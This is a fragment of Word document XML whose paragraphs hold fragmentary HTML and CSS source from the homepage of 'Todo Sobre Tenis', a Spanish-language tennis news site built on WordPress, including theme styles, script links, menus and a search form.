          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0395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feat1 - sub - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A78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feat1 - pop - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17B3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feat1 - list - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4917E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widget - feat1 - top - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312600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widget - feat1 - bot - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9D8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widget - dark - feat - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F43F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widget - dark - sub - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553711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widget - feat2 - left - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D25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widget - feat2 - right - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A73A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blog - story - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71860C6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flex - story - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96A2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vid - wide - more - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2AA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prev - next - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91AB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related - text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125C69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post - more - text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E402C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h2.mvp - authors - latest a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6C5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feat2 - bot - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D738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feat3 - sub - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B68C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feat3 - main - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E410D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feat4 - main - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B519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feat5 - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92DF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feat5 - mid - main - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63927F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feat5 - small - main - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06281F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feat5 - mid - sub - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C58D0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#mvp - feat6 - text h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064CD7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font - family: 'Oswald', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8DD5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0250C9CC" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705A53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feat2 - top - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54423E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feat1 - feat - text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F2A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h1.mvp - post - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3A0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h1.mvp - post - title - wide,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02A6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drop - nav - title h4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BA71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content - main blockquote p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3C9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post - add - main blockquote p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764833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- 404 h1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF97E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#woo - content h1.page - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DFB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div.product.product_title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DEBA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ul.products li.product h3 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C272A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font - family: 'Oswald', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55845B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51AAF197" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26030D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feat1 - pop - head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30FE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feat1 - pop - text: before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B318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feat1 - list - but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE82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widget - home - title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726982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widget - feat2 - side - more,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1B5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post - cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265575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span.mvp - page - head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B86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h1.mvp - author - top - head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E76E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authors - name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01994D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content - main h1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712CE8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content - main h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFF5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content - main h3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0151A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content - main h4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A72C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content - main h5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385465A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content - main h6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CD4B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.woocommerce.related h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C719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div.product.woocommerce - tabs.panel h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C59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.woocommerce div.product.product_title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363A9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feat5 - side - list.mvp - feat1 - list - img: after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716644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font - family: 'Roboto', sans - serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E61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549E866C" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6097B5DF" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372927A5" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E2B38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leader - wrap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EA3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position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABF4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6FC837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site - main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF656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margin - top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6640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1CBC72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#mvp - leader - wrap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483833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top: 0!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C747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441DFE7C" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB8A66D" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD573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.mvp - nav - links {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD55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display: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AAA4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84F2E2" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76668E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765AE7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/style&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E403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'stylesheet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305987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id = 'mvp-reset-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADF4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'http://todosobretenis.com/wp-content/themes/zox-news/css/reset.css?ver=4.9.18'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BEB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type = 'text/css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC797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media = 'all' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306D7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87AA8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'stylesheet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4E2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id = 'fontawesome-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348FBF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'http://todosobretenis.com/wp-content/themes/zox-news/font-awesome/css/font-awesome.css?ver=4.9.18'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD93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type = 'text/css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BF5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media = 'all' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE49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6C781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'stylesheet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED090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id = 'mvp-fonts-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241A7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'//fonts.googleapis.com/css?family=Advent+Pro%3A700%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COpen+Sans%3A700%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CAnton%3A400%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CPT+Serif%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBF8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type = 'text/css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B59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media = 'all' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAE4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E52F9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'stylesheet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703839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id = 'mvp-media-queries-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812CC5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'http://todosobretenis.com/wp-content/themes/zox-news/css/media-queries.css?ver=4.9.18'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44368C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type = 'text/css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2D6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media = 'all' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F65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9F9275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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366642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'http://todosobretenis.com/wp-includes/js/jquery/jquery.js?ver=1.12.4' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C175CD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751F7C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'http://todosobretenis.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B6C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96AC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'http://todosobretenis.com/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.15' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E552B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'https://api.w.org/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54606D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'http://todosobretenis.com/wp-json/' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C3B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1A64F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"EditURI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453EF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type = "application/rsd+xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13090D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title = "RSD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4818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"http://todosobretenis.com/xmlrpc.php?rsd" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D63F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3619B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"wlwmanifest"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5291F9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type = "application/wlwmanifest+xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D5A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href = "http://todosobretenis.com/wp-includes/wlwmanifest.xml" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4BDE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5A4D1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meta name = "generator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F009A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content = "WordPress 4.9.18" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654639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21F2E9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'shortlink'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B05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'http://todosobretenis.com/' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625F8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9BDC5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"alternate"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A6A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type = "application/json+oembed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EBC8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"http://todosobretenis.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftodosobretenis.com%2F" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D727D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C3B73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link rel = "alternate"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBCE7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type = "text/xml+oembed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D126E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"http://todosobretenis.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftodosobretenis.com%2F&amp;#038;format=xml" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718FF7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50CAF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/head&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4A6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body class = "home page-template page-template-page-home page-template-page-home-php page page-id-79" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7771B0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F840D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"mvp-fly-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6817F6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A64C4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"mvp-fly-menu-top"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D0B09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0F144C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8BD3B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"mvp-fly-top-out left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FC7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CE663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"mvp-fly-top-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D804C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E0B20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"mvp-fly-logo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE648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7DC40E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56EF9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"http://todosobretenis.com/" &gt; &lt; img src = "http://todosobretenis.com/wp-content/uploads/2019/01/tstchico.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D734C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"Todo Sobre Tenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5068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data - rjs = "2" / &gt; &lt; /a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA5B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/div&gt;&lt;!--mvp-fly-logo--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466630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/div&gt;&lt;!--mvp-fly-top-in--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596533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"mvp-fly-but-wrap mvp-fly-but-menu mvp-fly-but-click" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64AF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3B62D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1F0C3E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33C4B6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1CA63F2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30D088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/div&gt;&lt;!--mvp-fly-but-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B076F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/div&gt;&lt;!--mvp-fly-top-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77454F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/div&gt;&lt;!--mvp-fly-menu-top--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390CED5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"mvp-fly-menu-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF912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153C65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nav class = "mvp-fly-nav-menu left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC35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1C561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"menu-mobila-container" &gt; &lt; ul id = "menu-mobila"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E25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"menu" &gt; &lt; li id = "menu-item-1619"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67277C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"menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-1619" &gt; &lt; a href = "http://todosobretenis.com/" &gt; Home &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6ED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06CEA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id = "menu-item-1620"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6DDA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"menu-item menu-item-type-post_type menu-item-object-page menu-item-1620" &gt; &lt; a href = "http://todosobretenis.com/escribi-en-la-web/" &gt; EscribÃ­ en la web &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6995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FA2D9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id = "menu-item-1621"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158907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"menu-item menu-item-type-post_type menu-item-object-page menu-item-1621" &gt; &lt; a href = "http://todosobretenis.com/anuncia-en-tst/" &gt; Anuncia en TST &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E139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F6F3A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id = "menu-item-1622"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AF6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"menu-item menu-item-type-post_type menu-item-object-page menu-item-1622" &gt; &lt; a href = "http://todosobretenis.com/sobre-nosotros/" &gt; Sobre Nosotros &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4050F5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CE1BA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/ul&gt;&lt;/div &gt; &lt; /nav&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB88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/div&gt;&lt;!--mvp-fly-menu-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D51E7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"mvp-fly-soc-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2966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1434F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"mvp-fly-soc-head" &gt; Conectate con nosotros &lt; /span&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5872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ul class = "mvp-fly-soc-list left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1231CB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B54E4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&gt; &lt; a href = "http://facebook.com/todosobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C11B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B63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"fa fa-facebook fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E00F3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57D1A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&gt; &lt; a href = "https://twitter.com/Tsobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7719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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13118C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"fa fa-twitter fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23390D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ED24B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&gt; &lt; a href = "https://www.instagram.com/todosobretenis/?hl=es"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA67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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584301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"fa fa-instagram fa-2" &gt; &lt; /a&gt;&lt;/li &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAF0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1CAAC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/ul&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D6E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/div&gt;&lt;!--mvp-fly-soc-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109093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/div&gt;&lt;!--mvp-fly-wrap--&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;div id="mvp-site" class="left relative"&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586A0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"mvp-search-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4F5B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71488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"mvp-search-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B87C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594461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form method = "get"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3451347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id = "searchform"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A55E8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action = "http://todosobretenis.com/" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC51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557B4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input type = "text"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9BD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name = "s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B589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id = "s"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6103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value = "Buscar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD25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onfocus = 'if (this.value == "Buscar") { this.value = ""; }'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EC0B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onblur = 'if (this.value == "") { this.value = "Buscar"; }' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A532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C8E83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input type = "hidden"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625313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id = "searchsubmit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281682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value = "Buscar" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AA72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FE64B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/form&gt;</w:t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 &gt; &lt; !--mvp - search - box-- &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E720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DC4C88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div class = "mvp-search-but-wrap mvp-search-click" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E5D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655A7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6EFF0E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49DE4D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/div&gt;&lt;!--mvp-search-but-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70511C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/div&gt;&lt;!--mvp-search-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B64F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"mvp-site-wall"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5725B8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5D22F7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187CC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"mvp-leader-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4FF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D8D1F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"https://www.dublintravel.tur.ar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E1D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A894B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"noopener" &gt; &lt; img class = "aligncenter size-full wp-image-2313"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033C1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"http://todosobretenis.com/wp-content/uploads/2020/01/Dublin-banne-gif-852x106-HOME.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BBC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7C0F6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width = "852"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C443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"106" / &gt; &lt; /a&gt;</w:t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 &gt; &lt; !--mvp - leader - wrap-- &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DB0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9474C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"mvp-site-main"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4316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1BB940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FCE6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header id = "mvp-main-head-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AF4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73EA62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1C406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nav id = "mvp-main-nav-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DB3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6C3912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47CCB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"mvp-main-nav-top"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299DE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040A09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028F5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"mvp-main-box" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6481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0CF8F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"mvp-nav-top-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B98B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6A347F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B17B6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"mvp-nav-top-right-out left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2CC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D0B12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"mvp-nav-top-right-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC92A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C7507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"mvp-nav-top-cont left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F50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ACD40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"mvp-nav-top-left-out relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E99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9BB16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"mvp-nav-top-left" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09679B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6BCF1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"mvp-nav-soc-wrap" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AB4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EFCCF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"http://facebook.com/todosobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B5CF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 &gt; &lt; span class = "mvp-nav-soc-but fa fa-facebook fa-2" &gt; &lt; /span&gt;&lt;/a &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F262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DBCF0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"https://twitter.com/Tsobretenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AC1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 &gt; &lt; span class = "mvp-nav-soc-but fa fa-twitter fa-2" &gt; &lt; /span&gt;&lt;/a &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B50F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525DA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"https://www.instagram.com/todosobretenis/?hl=es"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083944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 &gt; &lt; span class = "mvp-nav-soc-but fa fa-instagram fa-2" &gt; &lt; /span&gt;&lt;/a &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814A8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B9625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/div&gt;&lt;!--mvp-nav-soc-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2845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"mvp-fly-but-wrap mvp-fly-but-click left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760063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7FAB6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382FDB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1EF7F9D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2A391C5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6C0181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/div&gt;&lt;!--mvp-fly-but-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9F4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/div&gt;&lt;!--mvp-nav-top-left--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493A2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"mvp-nav-top-left-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED63D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C1228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"mvp-nav-top-mid left relative"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3DA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itemscope itemtype = "http://schema.org/Organization" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF48D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FDB48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class = "mvp-nav-logo-reg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C0F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itemprop = "url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A74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"http://todosobretenis.com/" &gt; &lt; img itemprop = "logo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B10D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"http://todosobretenis.com/wp-content/uploads/2019/01/tstchico-1.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63539C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"Todo Sobre Tenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B88D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data - rjs = "2" / &gt; &lt; /a&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5813EB0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class = "mvp-nav-logo-small"</w:t>
      </w:r>
    </w:p>
